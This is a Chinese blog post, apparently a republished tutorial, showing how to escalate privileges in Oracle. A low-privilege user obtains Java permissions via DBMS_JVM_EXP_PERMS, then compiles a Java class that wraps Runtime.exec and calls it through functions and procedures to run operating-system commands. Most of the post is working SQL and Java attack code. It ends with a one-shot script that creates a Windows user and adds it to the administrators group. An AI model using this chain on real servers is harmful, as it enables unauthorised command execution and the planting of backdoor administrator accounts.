Oracle数据库提权(dba权限执行系统命令)

最新推荐文章于 2023-12-06 15:53:25 发布
最新推荐文章于 2023-12-06 15:53:25 发布
阅读量541 收藏
点赞数
原文链接:https://www.cnblogs.com/-qing-/p/10768290.html#autoid-1-0-2
版权

Oracle数据库提权(dba权限执行系统命令)

 

0x01 提权准备

这里我们先创建一个低权限的用户test

 

SQL> conn sys/admin123@orcl as sysdba;

 

已连接。

SQL> create user test identified by test;

 

 

 

然后查看一下权限


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     SQL> select * from session_privs;
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PRIVILEGE
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     CREATE SESSION

 

如上显示,test没有JAVA权限,也只有CREATE SESSION权限

 

我们如果要通过数据库执行系统命令,那么首先要提升数据库用户的权限。

 

 

 

我们首先要获取java权限


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     DECLARE
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '
     
     <<ALL
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
     
     FILES>>', 'execute', 'ENABLED' FROM DUAL;
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         BEGIN
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         OPEN C1;
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         FETCH C1 BULK COLLECT INTO POL;
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         CLOSE C1;
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    
    
    
   
   
  18. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  19. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         END;
    
    
    
   
   
  20. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  21. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
        /

 

 

如果想要执行任意代码的话还需要额外获得java.lang.RuntimePermission权限


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     DECLARE
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     'writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         BEGIN
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         OPEN C1;
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         FETCH C1 BULK COLLECT INTO POL;
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         CLOSE C1;
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    
    
    
   
   
  18. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  19. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         END;
    
    
    
   
   
  20. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  21. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
        /
    
    
    
   
   
  22. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  23. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
      DECLARE
    
    
    
   
   
  24. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  25. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    
    
    
   
   
  26. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  27. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
    
    
    
   
   
  28. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  29. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     'readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
    
    
    
   
   
  30. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  31. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         BEGIN
    
    
    
   
   
  32. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  33. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         OPEN C1;
    
    
    
   
   
  34. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  35. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         FETCH C1 BULK COLLECT INTO POL;
    
    
    
   
   
  36. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  37. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         CLOSE C1;
    
    
    
   
   
  38. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  39. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    
    
    
   
   
  40. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  41. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         END;
    
    
    
   
   
  42. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  43. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
        /

 

 

0x02 JAVA权限执行命令

 

用我们的test帐号登录

 

 

1、首先我们创建java包

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

 

 

 

2、然后我们获取java权限

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;

 

 

3、创建我们用来执行命令的函数


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     select dbms_xmlquery.newcontext('declar
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     e PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

 

4、执行命令

select LinxRUNCMD('whoami') from dual;

 

 

0x03 存储过程执行命令

 

若我们有create procedure权限,而不只是create session这么苦逼时,我们可以创建一个java class然后用创建一个过程来进行调用

 

 

1、首先创建一个java class然后用procedure包装它进行调用


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     create or replace and resolve java source named JAVACMD as
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         import java.lang.*;
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         import java.io.*;
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         public class JAVACMD
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         {
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
            public static void execmd(String command) throws IOException
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
            {
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
                    Runtime.getRuntime().exec(command);
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
            }
    
    
    
   
   
  18. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  19. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
        }
    
    
    
   
   
  20. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  21. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
        /

 

 

 

 

2、创建调用的包


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     create or replace procedure MYJAVACMD(command in varchar) as language java
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
         name 'JAVACMD.execmd(java.lang.String)';
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     /

 

 

3、执行我们的命令

EXEC MYJAVACMD('net user qingxin qingxin /add');

 

 

会报错是因为代码中没有捕获异常,我们再执行一次即可

 

 

 

 

附上一把梭哈

 

 


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     CREATE OR REPLACE AND RESOLVE Java SOURCE NAMED "JAVACMD" AS
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     import java.lang.*;
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     import java.io.*;public class JAVACMD
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     {public static void execCommand (String command) throws IOException
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     {
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Runtime.getRuntime().exec(command);
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     }
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     };/
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
    
    
    
   
   
  18. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  19. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     AS LANGUAGE JAVA
    
    
    
   
   
  20. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  21. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     NAME 'JAVACMD.execCommand (java.lang.String)';/
    
    
    
   
   
  22. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  23. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     exec javacmdproc('cmd.exe /c net user qingxin qingxin /add');
    
    
    
   
   
  24. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  25. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     exec javacmdproc('cmd.exe /c net localgroup administrators qingxin /add');

 

bylfsj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mssql&oracle数据库提权
m0_62207170的博客
03-19 1134
mssql&oracle数据库提权
第79篇:记一次Oracle注入漏洞提权的艰难过程
ABC_123的博客
10-28 1801
Part1 前言大家好,我是ABC_123。前不久遇到一个Oracle注入漏洞,是搜索型的盲注漏洞,只能用折半法一个字符一个字符的猜解数据,使用sqlmap可以直接跑出来,经过判断是DBA权限。接下来就是想办法通过这个注入点获取操作系统的权限,但是遇到了很多问题,于是搭建环境研究了一天,最后终于获取系统权限,本期ABC_123就把这个案例分享给大家。注:本篇文章中的一些说法可能与其它文章不一样...
生产环境中oracle dba权限检查和回收相关命令汇总
力哥讲技术
11-06 1235
Oracle数据库生产环境中,回收oracle dba权限的作用和意义重大,具体表现在以下三方面:安全性:回收赋权检查和回收可以确保数据库中的权限控制得到有效管理。通过检查和回收权限,可以防止未经授权的用户访问敏感数据或执行危险操作。数据完整性:回收赋权检查和回收可以帮助确保数据库中的数据完整性。通过检查和回收权限,可以防止未经授权的用户对数据进行修改、删除或插入操作,从而保护数据的完整性。性能优化:回收赋权检查和回收可以帮助优化数据库的性能。
Day60权限提升-MY&MS&ORA等SQL数据库提权
最新发布
san3144393495的博客
12-06 1010
在web环境和本地环境,都可以得到数据库的账户密码,都可以尝试借助数据库提权,再利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务以及获取最高权限的密码。除了access数据库外,其他的数据库都存在提权的可能数据库提权第一步是探针,第二步是收集,第三步是分类,数据库在应用提权权限提升的意义,他不是属于溢出漏洞的提权,他不是漏洞的提权方式,数据库在服务器的上的搭建是很常见的,web和本地都可以用数据库提权,满足条件就是只需要获取数据库账号密码。
第60天-权限提升-MY&MS&ORA 等 SQL 数据库提权
MCTSOG的博客
04-29 2099
思维导图 权限提升 数据库提权 ​ 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。 数据库应用提权权限提升中的意义 WEB 或本地环境如何探针数据库应用 数据库提权权限用户密码收集等方法 目前数据库提权对应的技术及方法等 知识点 提权流程 服务探针---->信息收集----->提权利用----->获取权限 数据库端口号 关系型数
oracle数据库dba角色权限解析.xls
06-22
oracle数据库dba权限,里面的权限解释。
oracle提权工具-oracleShell.zip
05-04
Oracle数据库是全球广泛使用的数据库管理系统,它在企业级应用中占据着重要地位。然而,由于其复杂的权限系统,Oracle数据库也成为了黑客攻击的目标。"Oracle提权工具"是指那些可以帮助攻击者或者安全研究人员在...
如何创建Oracle数据库(手动执行CreateDataBase命令创建).pdf
09-06
Oracle数据库管理中,创建一个新的数据库是一个复杂但重要的任务,特别是在Oracle Certified Master (OCM) 实验考试中,考生可能需要手动执行这个过程,而不能依赖于图形化的Database Configuration Assistant ...
db.rar_oracle_数据库 权限
09-21
Oracle数据库提供了一套精细的权限系统,允许DBA控制用户对数据库对象(如表、视图、过程等)的访问级别。主要有三种类型的权限:SELECT、INSERT、UPDATE、DELETE用于数据操作,EXECUTE用于运行存储过程和函数,以及...
Oracle数据库的角色与权限管理.pdf
10-10
Oracle数据库的角色与权限管理是数据库安全性和访问控制的关键组成部分。Oracle数据库通过精细的权限机制确保了数据的安全性,使得用户只能访问他们被授权的数据。在Oracle中,权限分为系统级权限和对象级权限。 ...
ORACLE直连数据库注入提权详解.pdf
07-03
ORACLE直连数据库注入提权详解 linux和windows系统直连oracle数据库提权和修复详解
Oracle创建用户,并授权DBA权限
01-07
详细讲解Oracle用户的创建,并分级授权,和关于DBA的授权。还有关于授予Oracle导入导出的权限
提权-MY&MS&ORA数据库提权
qi_SJQ_的博客
02-01 1541
数据库提权: 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权来获得系统权限,不是提升数据库用户的权限,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库提权的可能。 #数据库应用提权权限提升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库提权权限用户密码收集等方法 #目前数据库提权对应的技术及方法等 提权流程:服务探针->信息收集->提权利用->获取权限 探针查看是否...
oracle 调用 程序,oracle能否实现调用外部程序
weixin_39802020的博客
04-08 376
One example from Tom:rem 1.授权begindbms_java.grant_permission('SYS','java.io.FilePermission','/bin/ps','execute');dbms_java.grant_permission('SYS','java.lang.RuntimePermission','*','writeFileDescriptor...
Oracle注入 - 命令执行&Shell反弹
热门推荐
3569
05-07 1万+
https://www.t00ls.net/thread-45663-1-1.html0x01 Oracle安装CentOS 7 安装oracle10g,装了一天,特此记录 oracle9i,10G,11G,各版本下载资源Centos6/7下静默安装oracle10g0x02 命令执行本文测试环境均为:CentOS Linux release 7.2.1511 (Core)Oracle Datab...
oracle数据库用户权限详解
weixin_45765103的博客
02-22 2796
SYSKM每个新的管理权限都会授予完成每个管理区域中的任务所需的最低权限。作为 DBA,您经常执行特殊操作,例如关闭或启动数据库。因为只有 DBA 应该执行这些操作,所以数据库管理员用户名需要安全的身份验证方案。此权限允许用户从 Oracle Recovery Manager (RMAN) 或 SQL*Plus 执行备份和恢复操作。此管理权限允许大多数操作,包括查看用户数据的能力。管理员执行基本数据库操作所需的管理权限是通过特殊系统权限授予的。您必须拥有授予您的这些特权之一,具体取决于您需要的授权级别。
oracle普通用户提权,oracle 10g 漏洞--低权限用户提权方法
weixin_42150745的博客
04-04 504
oracle权限用户提权方法:【漏洞名称】 sys.dbms_export_extension.get_domain_index_metadata 提升权限漏洞【影响平台】Oracle 8i / 9i / 10g / XE【风险等级】高【攻击需求】较低权限账号【造成危害】取得管理员权限【内容描述】oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7,...
Oracle的对象权限、角色权限、系统权限
coco3600的博客
06-15 1179
Oracle的对象权限、角色权限、系统权限 一、用户与模式 用户:对数据库的访问,需要以适当用户身份通过验证,并具有相关权限来完成一系列动作 ...
oracle数据库注入提权,Oracle数据库Oracle 提权笔记
weixin_29268331的博客
04-02 377
本文主要向大家介绍了Oracle数据库Oracle 提权笔记,通过具体的内容向大家展现,希望对大家学习Oracle数据库有所帮助。PART3代码/命令执行:http://www.tuicool.com/articles/A3Yzaqhttps://www.notsosecure.com/hacking-oracle-11g/犀利的oracle注入技术http://www.jb51....
Oracle数据库2天DBA速成指南
"Oracle数据库2天DBA.pdf" 是一份针对Oracle数据库管理员(DBA)的培训资料,专注于11G2版本(11.2)。这份文档由Oracle公司及其关联公司的专家编写,旨在帮助DBA们理解和掌握Oracle数据库的管理和维护。 在Oracle...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值